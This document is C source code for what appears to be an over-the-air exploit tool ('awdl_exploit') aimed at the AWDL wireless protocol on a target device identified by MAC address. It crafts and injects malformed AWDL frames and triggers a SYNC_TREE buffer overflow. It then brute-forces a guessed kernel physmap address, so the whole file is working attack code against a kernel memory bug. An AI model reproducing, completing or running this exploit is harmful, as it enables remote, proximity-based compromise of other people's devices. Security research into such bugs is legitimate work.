struct service_response_physmap_spray_tlv {
    uint8_t type;
    uint16_t len;
    uint16_t s_1;
    uint8_t key_buf[2];
    uint16_t v_1;
    uint16_t v_2;
    uint32_t val_buf[2];
} __attribute__((packed)); // 19 bytes

pkt_buf_t* SERV_RESP_PHYSMAP(uint16_t kalloc_size) {
    struct service_response_physmap_spray_tlv sr = {0};

    sr.type = 2;
    sr.len = sizeof(struct service_response_physmap_spray_tlv) - 3;
    sr.s_1 = 2;
    sr.key_buf[0] = 'A';
    sr.key_buf[1] = 'B';
    sr.v_1 = kalloc_size;
    sr.v_2 = 0x0; // offset
    sr.val_buf[0] = 6; // msg_id
    sr.val_buf[1] = 0x320; // length

    return pkt_buf_wrap(&sr, sizeof(sr));
}

pkt_buf_t* SERV_PARAM() {
    struct service_params_tlv sp = {0};

    sp.type = 6;
    sp.len = sizeof(struct service_params_tlv) - 3;
    sp.unk[0] = 0;
    sp.unk[1] = 0;
    sp.unk[2] = 0;
    sp.sui = 0;
    sp.bitmask = 0;

    return pkt_buf_wrap(&sp, sizeof(sp));
}

void test_physmap_disclosure(struct ether_addr dst) {
    uint64_t physmap_kva_guess = 0xfffffff110000000;

    struct ether_addr peer_a = *(ether_aton("22:22:aa:00:00:00"));
    struct ether_addr peer_b = *(ether_aton("22:22:bb:00:00:00"));

    for (int i = 0; i < 20; i++) {
        *(((uint8_t*)&peer_a)+5) = i;
        *(((uint8_t*)&peer_b)+5) = i;


        struct ether_addr peers[6];
        peers[0] = peer_a;

        // make peer_a suitable for bss steering
        inject(RT(),
               WIFI(dst, peer_a),
               AWDL(),
               SYNC_PARAMS(),
               HT_CAPS(),
               UNICAST_DATAPATH(0x1307 | 0x800),
               PKT_END());

        // initiate bss steering for peer_a from peer_b
        if (i == 0) {
            inject(RT(),
                   WIFI(dst, peer_b),
                   AWDL(),
                   SYNC_PARAMS(),
                   HT_CAPS(),
                   UNICAST_DATAPATH(0x1307),
                   BSS_STEERING(peers, 1),
                   PKT_END());
        } else {
            inject(RT(),
                   WIFI(dst, peer_b),
                   AWDL(),
                   SYNC_PARAMS(),
                   HT_CAPS(),
                   UNICAST_DATAPATH(0x1307),
                   BSS_STEERING_0(peers, 1),
                   PKT_END());
        }

        // get time
        struct timeval tv_start = {0};
        gettimeofday(&tv_start, NULL);

        for (;;) {
            // send another broadcast datapath to allocate the chanseq and kickstart UMIs, but also include an overflow at the end :)
            char overflower[128] = {0};
            *(uint64_t*)(&overflower[0x50]) = physmap_kva_guess;

            inject(RT(),
                   WIFI(dst, peer_a),
                   AWDL(),
                   SYNC_PARAMS(),
                   SERV_PARAM(),
                   REPEAT(SERV_RESP(), 40),
                   HT_CAPS(),
                   DATAPATH(peer_a), // broadcast datapath, to get the chanseq allocated
                   SYNC_TREE((struct ether_addr*)overflower, sizeof(overflower)/sizeof(struct ether_addr)),
                   PKT_END());
            

            // have 4 seconds elapsed?

            struct timeval tv_now = {0};
            gettimeofday(&tv_now, NULL);
            if (tv_now.tv_sec - tv_start.tv_sec > 4) {
                break;
            }

            physmap_kva_guess -= ((10*1024*1024)+0x40); // bump down a bit
        }

        // time to bail, trigger the overflow to NULL out the bsssteering blob
        char null_overflower [128] = {0};
        inject(RT(),
               WIFI(dst, peer_a),
               AWDL(),
               SYNC_PARAMS(),
               SERV_PARAM(),
               REPEAT(SERV_RESP(), 40),
               HT_CAPS(),
               DATAPATH(peer_a),
               SYNC_TREE((struct ether_addr*)null_overflower, sizeof(null_overflower)/sizeof(struct ether_addr)),
               PKT_END());

        // wait for steering to fail
        sleep(4);

        // reset the state machine
        log_msg("trying to restart using msg 0");
    }
}

int main(int argc, char** argv) {
    char errbuf[PCAP_ERRBUF_SIZE];

    if (argc < 3) {
        fail("./awdl_exploit <interface_name> <target_mac>");
    }

    char* interface_name = argv[1];

    log_msg("using interface: %s", interface_name);
    
    pcap_t* pcap_handle = setup_wlan_device_faster(interface_name);
    global_pcap_handle = pcap_handle;

    if (strcmp(argv[2], "UMI") == 0) {
        printf("going in to UMI parsing mode...\n");
        struct ether_addr monitor_target_mac = *(ether_aton(argv[3]));
        monitor_umi(pcap_handle, &monitor_target_mac);
        return 0;
    }

    struct ether_addr* parsed_mac = ether_aton(argv[2]);
    if (parsed_mac == NULL) {
        fail("unable to parse target mac address");
    }

    struct ether_addr dst_mac = *parsed_mac;

    test_physmap_disclosure(dst_mac);

    return 0;
}
